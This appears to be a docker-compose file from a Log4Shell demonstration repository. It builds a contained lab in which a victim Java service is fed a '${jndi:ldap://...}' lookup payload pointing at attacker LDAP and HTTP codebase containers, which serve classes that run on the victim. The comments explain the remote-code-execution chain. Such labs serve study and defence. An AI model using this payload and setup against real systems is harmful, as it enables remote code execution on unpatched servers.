Log4Shell
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 

66 lines
2.4 KiB

version: "3"
services:
# The service on which to gain RCE
victim:
build:
context: ${PWD}/src/victim/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "victim"
environment:
JAVA_OPTS: >-
-Dvictim-payload=$${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker}
depends_on:
- attacker_ldap_registry
- attacker_ldap_registry_setup
- attacker_codebase
# The attacker hosts a server which the victim can use to look up the location
# of the code to execute. Specifically, the directory server will contain a
# `Reference` containing a factory class to use to construct an object. This
# factory class is executed on the victim, giving RCE.
#
# Many frameworks can be used for this, including RMI and CORBA. We just use
# an LDAP server.
attacker_ldap_registry:
image: "bitnami/openldap:2.5"
environment:
LDAP_PORT_NUMBER: "1389"
LDAP_ROOT: "dc=ldap-registry,dc=attacker"
LDAP_ADMIN_USERNAME: "admin"
LDAP_ADMIN_PASSWORD: "admin"
LDAP_USERS: "nobody"
LDAP_PASSWORDS: "nobody"
LDAP_GROUP: "users"
LDAP_EXTRA_SCHEMAS: "cosine,inetorgperson,nis,java,corba"
LDAP_ALLOW_ANON_BINDING: "yes"
ports:
- "1389:1389"
# The LDAP registry must be initialized with data. The `Reference` must be
# placed into the directory. This could easily be done with an LDIF file on
# bootstrap, but we write a Kotlin program to do that for us.
attacker_ldap_registry_setup:
build:
context: ${PWD}/src/attacker_ldap_registry_setup/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "attacker_ldap_registry_setup"
environment:
JAVA_OPTS: >-
-Dattacker-ldap-registry-url=ldap://attacker_ldap_registry:1389/dc=ldap-registry,dc=attacker
-Dattacker-codebase-url=http://attacker_codebase:80/
depends_on:
- attacker_ldap_registry
# The victim needs to know the classes of the objects the attacker feeds it.
# In Java parlance, the victim needs to know the "codebase" of the attacker.
# We set that up here. This HTTP server will host the `.class` files needed by
# the victim for remote code execution.
attacker_codebase:
build:
context: ${PWD}/src/attacker_codebase
dockerfile: ${PWD}/docker/gradle-java-codebase.Dockerfile
ports:
- "8080:80"